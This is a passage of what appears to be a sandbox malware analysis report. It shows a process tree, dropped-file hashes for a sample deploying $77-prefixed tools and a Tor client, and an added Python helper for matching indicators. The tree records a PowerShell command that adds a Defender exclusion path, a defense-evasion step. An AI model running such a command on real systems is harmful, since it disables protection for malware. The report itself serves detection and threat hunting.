                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                          1⤵
                                                            PID:1384
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                            1⤵
                                                              PID:1448
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                              1⤵
                                                                PID:1460
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1476
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                  1⤵
                                                                    PID:1584
                                                                    • C:\Windows\system32\sihost.exe
                                                                      sihost.exe
                                                                      2⤵
                                                                        PID:2996
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                      1⤵
                                                                        PID:1636
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                        1⤵
                                                                          PID:1688
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                          1⤵
                                                                            PID:1724
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                            1⤵
                                                                              PID:1816
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                              1⤵
                                                                                PID:1852
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                1⤵
                                                                                  PID:1884
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                  1⤵
                                                                                    PID:1900
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                    1⤵
                                                                                      PID:1960
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                      1⤵
                                                                                        PID:1980
                                                                                      • C:\Windows\System32\spoolsv.exe
                                                                                        C:\Windows\System32\spoolsv.exe
                                                                                        1⤵
                                                                                          PID:1004
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                          1⤵
                                                                                            PID:2060
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2276
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                              1⤵
                                                                                                PID:2284
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                                1⤵
                                                                                                  PID:2296
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2448
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                                  1⤵
                                                                                                    PID:2484
                                                                                                  • C:\Windows\sysmon.exe
                                                                                                    C:\Windows\sysmon.exe
                                                                                                    1⤵
                                                                                                      PID:2512
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                      1⤵
                                                                                                        PID:2584
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                        1⤵
                                                                                                          PID:2596
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                          1⤵
                                                                                                            PID:2604
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                            1⤵
                                                                                                              PID:2104
                                                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2184
                                                                                                              • C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
  1⤵
  PID:3096
• C:\Windows\Explorer.EXE
  C:\Windows\Explorer.EXE
  1⤵
  • Suspicious use of UnmapMainImage
  PID:3420
  • C:\Users\Admin\AppData\Local\Temp\c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe
    "C:\Users\Admin\AppData\Local\Temp\c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe"
    2⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      3⤵
      PID:4320
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:/windows/$77driver'"
      3⤵
      • Suspicious use of WriteProcessMemory
      PID:868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:/windows/$77driver'"
        4⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3476
    • C:\windows\$77driver\$77tor.exe
      C:/windows/$77driver\$77tor.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2316
      • C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        4⤵
        PID:3156
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3140
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1036
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2216
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2204
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4628
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:532
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2224
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4460
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2876
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1708
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4380
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2620
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3172
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3256
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1512
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:928
    • C:\windows\$77driver\$77install.exe
      C:/windows/$77driver\$77install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3992
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
  1⤵
  PID:3428
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
  PID:3604
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3788
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Suspicious use of AdjustPrivilegeToken
  • Suspicious use of UnmapMainImage
  PID:3952
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:3436
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
  PID:4820
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  1⤵
  PID:3840
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  PID:4188
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  • Drops file in System32 directory
  PID:4960
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Suspicious use of UnmapMainImage
  PID:3988
• C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  1⤵
  PID:4220
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  1⤵
  PID:5060
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  1⤵
  PID:4748
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
  PID:3160
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  1⤵
  PID:2880
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  PID:2836
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
  PID:2168
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  1⤵
  PID:3340
• C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  1⤵
  PID:1672
• C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  1⤵
  PID:2968
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  1⤵
  PID:4824
• C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3564
                                                                                                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4588
                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4296
                                                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:992
                                                                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3508

Network

MITRE ATT&CK Enterprise v15

Downloads

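Each entry in this list is a path followed by its size and four digests, and the Update Orchestrator task files appear twice with different digests. The Python below is an added example, not code from this report or from the sandbox that produced it: it parses a handful of the entries (copied from this list), checks that every digest is well-formed, flags paths that were written more than once with different content, flags path components carrying the $77 prefix, and recomputes the same four digests over bytes you hold locally so a suspect file can be matched against an entry. Two things in it are my assumptions rather than the report's: the one-line probe that powershell.exe writes to __PSScriptPolicyTest_*.ps1 while checking for an AppLocker/WDAC lockdown policy (the report lists only the file and its hashes, so the block reports whether that content reproduces them rather than relying on it), and the reading of $77 as the hiding prefix of the r77 userland rootkit.

```python
# Added example, not code from this report or its sandbox: turn the report's
# dropped-file entries into checked indicators and compare a local file to them.
import hashlib
import re
from collections import defaultdict

# Five entries copied from this report's Downloads list (label and value on
# one line here; the parser also accepts them on consecutive lines).
REPORT_RECORDS = r"""
• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svvh1equ.v2l.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
• C:\Windows\$77driver\$77install.exe
Filesize 163KB
MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
• C:\Windows\$77driver\$77tor.exe
Filesize 8.2MB
MD5 98e61b0349680d5630548911e355bcad
SHA1 ae47d8e3552a8adcb8670ce0c1fb45677510a8c3
SHA256 4dc2054d3023f671df5cd839a1080cba34e8d764897ace57535dcef6b1c11bf5
SHA512 232b8b0e327a683c5890129d5bf80fd52880f650ef1310e2d2fe5408438eb05e2d9c61d8c6cd7f40fb90bcc9b83dfc07fa5fcb3d1744daaef6f7467a3c8edca9
• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
Filesize 2KB
MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
Filesize 2KB
MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
"""

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}
# Assumption (mine, from the PowerShell source; the report lists only the
# file): the probe powershell.exe writes to __PSScriptPolicyTest_*.ps1.
PS_POLICY_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

def parse_size(text):
    """'163KB' -> 166912; None when the size string is unparseable."""
    m = re.fullmatch(r"([\d.]+)\s*(B|KB|MB)", text.strip())
    return int(float(m.group(1)) * SIZE_UNITS[m.group(2)]) if m else None

def parse_records(text):
    """One dict per '•' entry: 'path' plus each label -> value."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records, i = [], 0
    while i < len(lines):
        parts = lines[i].split()
        if lines[i].startswith("•"):
            records.append({"path": lines[i][1:].strip()})
            i += 1
        elif not records:
            i += 1                       # text before the first entry
        elif len(parts) == 2:            # "MD5 d17f..." on one line
            records[-1][parts[0]] = parts[1]
            i += 1
        elif i + 1 < len(lines):         # label line, value on the next line
            records[-1][lines[i]] = lines[i + 1]
            i += 2
        else:
            i += 1
    return records

def record_problems(rec):
    """Digests that are missing or not lowercase hex of the right length."""
    return [algo for algo, n in HASH_LENGTHS.items()
            if not re.fullmatch(r"[0-9a-f]{%d}" % n, rec.get(algo, ""))]

def rewritten_paths(records):
    """Paths listed more than once with different SHA256: the file was rewritten."""
    by_path = defaultdict(set)
    for rec in records:
        by_path[rec["path"]].add(rec.get("SHA256"))
    return {p: sorted(h) for p, h in by_path.items() if len(h) > 1}

def hidden_prefix_paths(records, prefix="$77"):
    """Paths with a component starting with prefix; '$77' is the r77 rootkit's
    hiding prefix (my identification, the report only lists the paths)."""
    return [r["path"] for r in records
            if any(part.startswith(prefix) for part in r["path"].split("\\"))]

def hashes_of(data):
    """The four digests the report lists, computed over bytes you hold."""
    return {a: hashlib.new(a.lower(), data).hexdigest() for a in HASH_LENGTHS}

def matches_record(data, rec):
    """True only if size and all four digests of data agree with the entry."""
    digests = hashes_of(data)
    return (parse_size(rec.get("Filesize", "")) == len(data)
            and all(digests[a] == rec.get(a) for a in HASH_LENGTHS))
```

Run over the copied entries it reports no malformed digests, one rewritten path (Schedule Maintenance Work) and the two $77driver binaries; `matches_record(PS_POLICY_PROBE, ...)` tells you whether the assumed probe text reproduces the 60-byte file's hashes. The rewritten files are the Update Orchestrator's own task definitions, and the tree above shows svchost -s UsoSvc, mousocoreworker.exe and TiWorker.exe active, so those writes are consistent with routine update activity in the VM; nothing on this page ties them to the sample, and they make poor indicators. The $77driver paths, the Tor client cache under AppData\Roaming\tor, and the digests of $77install.exe and $77tor.exe are the entries worth carrying into a hunt.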
• C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Filesize 328B
  MD5 f997ff769824076d9cd3154d4706a7c5
  SHA1 c7892bd4b799ef3689c976ea2dd8392b57530fe0
  SHA256 d414d3d4efd64173cae17c53b4d096835d867dd285b22b1a4f3e39d40c31a610
  SHA512 4679e8c6402b989a7a52eaa5a3a5a675805f1a5e03cdfbe7ac4a829f9e5fcffcad3401c1387311ffd85ed6eb087a23f75c952492fdb7096a4167c9255b6c52da

• C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
  Filesize 330B
  MD5 ff3344814a4143f60942d02fb73c6e59
  SHA1 73e56a3376a67b56fd36addd53597c34b962437a
  SHA256 c19b36309bf95d154cf471a5cd101b87cfc92dfa44ca3a547ee261c339ca6ded
  SHA512 5090322d9bc50186c2970380dde9ae50fee05c92652876a5ab1474d3cf5d824a7c94849473b3c6089881f38c408e1027155e1d75f3d15f47a1a3eca2a395600a

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svvh1equ.v2l.ps1
  Filesize 60B
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Roaming\tor\cached-microdesc-consensus.tmp
  Filesize 2.6MB
  MD5 9c8f50326cfda1dc3545b91c02b5d607
  SHA1 b4eef66fd6b6510d582d80d37f861ca211e16b49
  SHA256 d2b9677b26403a40b53c1a9f9af8d572b62f03efb0dabac0c966fbe0fe118c57
  SHA512 8dd21d3ed878553d5e9ba8f2481ccbfa4ac319baa7cd7d1d89382f3b19f2885f36ac2f43879723372788da7fdc7966187d1a555d4a9eb19f42f3f39072d3a857

• C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
  Filesize 6.3MB
  MD5 b827f6464c650d2e6d4425113665a661
  SHA1 7bb72fad5e12794f82dae7ca89c0e1ebf7f386eb
  SHA256 c8d8dd5fc605fe19b602987a8bfc1cca5b17dfc3235b81af23257b94fec4f6bb
  SHA512 3d5575b6e4ddd68f6d7be6d8ebfe74a41545c5cf28be5c863ce0f2234785bea64d7643f8b1ae59a35d6a9e188a40bbbc346790109d5963285044ecde4bcd9c72

• C:\Windows\$77driver\$77install.exe
  Filesize 163KB
  MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

• C:\Windows\$77driver\$77tor.exe
  Filesize 8.2MB
  MD5 98e61b0349680d5630548911e355bcad
  SHA1 ae47d8e3552a8adcb8670ce0c1fb45677510a8c3
  SHA256 4dc2054d3023f671df5cd839a1080cba34e8d764897ace57535dcef6b1c11bf5
  SHA512 232b8b0e327a683c5890129d5bf80fd52880f650ef1310e2d2fe5408438eb05e2d9c61d8c6cd7f40fb90bcc9b83dfc07fa5fcb3d1744daaef6f7467a3c8edca9

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize 2KB
  MD5 8abf2d6067c6f3191a015f84aa9b6efe
  SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
  SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
  SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize 2KB
  MD5 f313c5b4f95605026428425586317353
  SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
  SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
  SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize 2KB
  MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
  SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
  SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
  SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize 2KB
  MD5 7d612892b20e70250dbd00d0cdd4f09b
  SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
  SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
  SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
  Filesize 2KB
  MD5 1e8e2076314d54dd72e7ee09ff8a52ab
  SHA1 5fd0a67671430f66237f483eef39ff599b892272
  SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
  SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

• C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                      SHA1

                                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                      SHA256

                                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                      SHA512

                                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                      SHA1

                                                                                                                                                                      445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                      SHA256

                                                                                                                                                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                      SHA512

                                                                                                                                                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      36fea3c7bd7bf5f15ee1a748daae1f24

                                                                                                                                                                      SHA1

                                                                                                                                                                      c5e0122744a61d18b64126bf35374e29ecfe7553

                                                                                                                                                                      SHA256

                                                                                                                                                                      bec6c6166fb67f7866ad5dad460b9212b3fe6a2f909638ec9abe465c6199ade4

                                                                                                                                                                      SHA512

                                                                                                                                                                      6ded68570e0234e985f5a58307e25f94e9980de39d306e16ab02d89f67b701c129ac740f48bc7f22a5befe78cbfe56bd76a31a12d17ffc973be1a8a3079de4c1

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      02a1a26525c65a359d41483180eaa6f7

                                                                                                                                                                      SHA1

                                                                                                                                                                      c0e2578b92d20e925c1c87016d1a9fccee1ec56f

                                                                                                                                                                      SHA256

                                                                                                                                                                      d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e

                                                                                                                                                                      SHA512

                                                                                                                                                                      d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      4aa190916ef25979ed4d07e0371416c5

                                                                                                                                                                      SHA1

                                                                                                                                                                      f03c994ef694dfe3fe3b0c93377c016431c2a64d

                                                                                                                                                                      SHA256

                                                                                                                                                                      6cea2de2bced825142de30b4ccedfc2d36e17a2b53721a50fcfe36de9fa715b1

                                                                                                                                                                      SHA512

